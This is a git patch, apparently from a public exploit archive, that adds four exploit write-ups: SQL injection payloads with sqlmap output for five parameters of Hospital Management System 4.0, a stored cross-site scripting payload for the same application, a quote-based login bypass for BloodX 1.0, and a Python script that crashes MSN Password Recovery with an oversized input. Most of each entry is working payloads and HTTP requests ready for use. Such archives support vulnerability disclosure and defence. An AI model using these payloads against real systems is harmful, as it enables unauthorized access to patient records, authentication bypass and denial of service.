From 3b67743b555633b22cb2a5696536e7bff642537a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 3 Jan 2020 05:02:00 +0000 Subject: [PATCH] DB: 2020-01-03 4 changes to exploits/shellcodes MSN Password Recovery 1.30 - Denial of Service (PoC) Hospital Management System 4.0 - 'searchdata' SQL Injection Hospital Management System 4.0 - Persistent Cross-Site Scripting BloodX 1.0 - Authentication Bypass --- exploits/php/webapps/47840.txt | 166 +++++++++++++++++++++++++++++++++ exploits/php/webapps/47841.txt | 36 +++++++ exploits/php/webapps/47842.txt | 30 ++++++ exploits/windows/dos/47839.py | 22 +++++ files_exploits.csv | 4 + 5 files changed, 258 insertions(+) create mode 100644 exploits/php/webapps/47840.txt create mode 100644 exploits/php/webapps/47841.txt create mode 100644 exploits/php/webapps/47842.txt create mode 100755 exploits/windows/dos/47839.py diff --git a/exploits/php/webapps/47840.txt b/exploits/php/webapps/47840.txt new file mode 100644 index 000000000..0561583d7 --- /dev/null +++ b/exploits/php/webapps/47840.txt @@ -0,0 +1,166 @@ +# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection +# Google Dork: N/A +# Date: 2020-01-02 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/hospital-management-system-in-php/ +# Version: v4.0 +# Tested on: Windows +# CVE : N/A + +# The Hospital Management System 4.0 web application is vulnerable to +# SQL injection in multiple areas, listed below are 5 of the prominent +# and easy to exploit areas. + +================================ 1 - SQLi ================================ + +POST /hospital/hospital/hms/doctor/search.php HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 22 +Origin: https://10.0.0.214 +DNT: 1 +Connection: close +Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php +Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 +Upgrade-Insecure-Requests: 1 + +searchdata=&search= + +?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login. + +POST parameter 'searchdata' is vulnerable. +sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests: +--- +Parameter: searchdata (POST) + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search= +--- +[15:49:58] [INFO] testing MySQL +[15:49:58] [INFO] confirming MySQL +[15:49:58] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.4.1 +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) +[15:49:58] [INFO] fetching database names +available databases [6]: +[*] hms +[*] information_schema +[*] mysql +[*] performance_schema +[*] phpmyadmin +[*] test + +================================ 2 - SQLi ================================ + +GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n +sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests: +--- +Parameter: viewid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim + + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp + +[15:54:21] [INFO] fetching database names +available databases [6]: +[*] hms +[*] information_schema +[*] mysql +[*] performance_schema +[*] phpmyadmin +[*] test + +GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login + +================================ 3 - SQLi ================================ + +Parameter: bs (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit= + +?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient + +================================ 4 - SQLi ================================ + +POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 111 +Origin: https://10.0.0.214 +DNT: 1 +Connection: close +Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 +Upgrade-Insecure-Requests: 1 + +patname= + +patname parameter is vulnerable to SQLi under the add patient in the doctor login + +================================ 5 - SQLi ================================ + +--- +Parameter: cpass (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123 +--- +available databases [6]: +[*] hms +[*] information_schema +[*] mysql +[*] performance_schema +[*] phpmyadmin +[*] test + +POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 38 +Origin: http://10.0.0.214 +DNT: 1 +Connection: close +Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php +Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 +Upgrade-Insecure-Requests: 1 + +cpass=123&npass=123&cfpass=123&submit=123 + +the ?cpass parameter is vulnerable to blind SQL injection \ No newline at end of file diff --git a/exploits/php/webapps/47841.txt b/exploits/php/webapps/47841.txt new file mode 100644 index 000000000..82679e2be --- /dev/null +++ b/exploits/php/webapps/47841.txt @@ -0,0 +1,36 @@ +# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 2020-01-02 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/hospital-management-system-in-php/ +# Version: v4.0 +# Tested on: Windows +# CVE : N/A + +================ 1. - Cross Site Scripting (Persistent) ================ + +URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php +Method : POST +Parameter: doctorspecilization +Attack : + +POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 97 +Origin: http://10.0.0.214 +DNT: 1 +Connection: close +Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= + +?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed \ No newline at end of file diff --git a/exploits/php/webapps/47842.txt b/exploits/php/webapps/47842.txt new file mode 100644 index 000000000..ac809958a --- /dev/null +++ b/exploits/php/webapps/47842.txt @@ -0,0 +1,30 @@ +# Exploit Title: BloodX 1.0 - Authentication Bypass +# Author: riamloo +# Date: 2019-12-31 +# Vendor Homepage: https://github.com/diveshlunker/BloodX +# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# Discription: +# An standalone platform which lets donors, receivers, organizers and sponsers to merge. +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost//BloodX-master/login.php + +POST /BloodX-master/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 63 +Referer: http://localhost/BloodX-master/login.php +Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN \ No newline at end of file diff --git a/exploits/windows/dos/47839.py b/exploits/windows/dos/47839.py new file mode 100755 index 000000000..965128414 --- /dev/null +++ b/exploits/windows/dos/47839.py @@ -0,0 +1,22 @@ +# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC) +# Date: 2020-01-02 +# Vendor Homepage: https://www.top-password.com/ +# Software Link: https://www.top-password.com/download/MSNPRSetup.exe +# Exploit Author: Gokkulraj +# Tested Version: v1.30 +# Tested on: Windows 7 x64 + +# 1.- Download and install MSN Password Recovery +# 2.- Run python code : MSN Password Recovery.py +# 3.- Open CRASH.txt and copy content to clipboard +# 4.- Open MSN Password Recovery and Click 'EnterKey' +# 5.- Paste the content of CRASH.txt into the Field: 'User Name and +Registration Code' +# 6.- click 'OK' you will see a crash. + +#!/usr/bin/env python +Dos= "\x41" * 9000 +myfile=open('CRASH.txt','w') +myfile.writelines(Dos) +myfile.close() +print("File created") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df1679a55..140392b7d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6626,6 +6626,7 @@ id,file,description,date,author,type,platform,port 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos, 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows, 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows, +47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42143,3 +42144,6 @@ id,file,description,date,author,type,platform,port 47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php, 47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware, 47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php, +47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php, +47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php, +47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,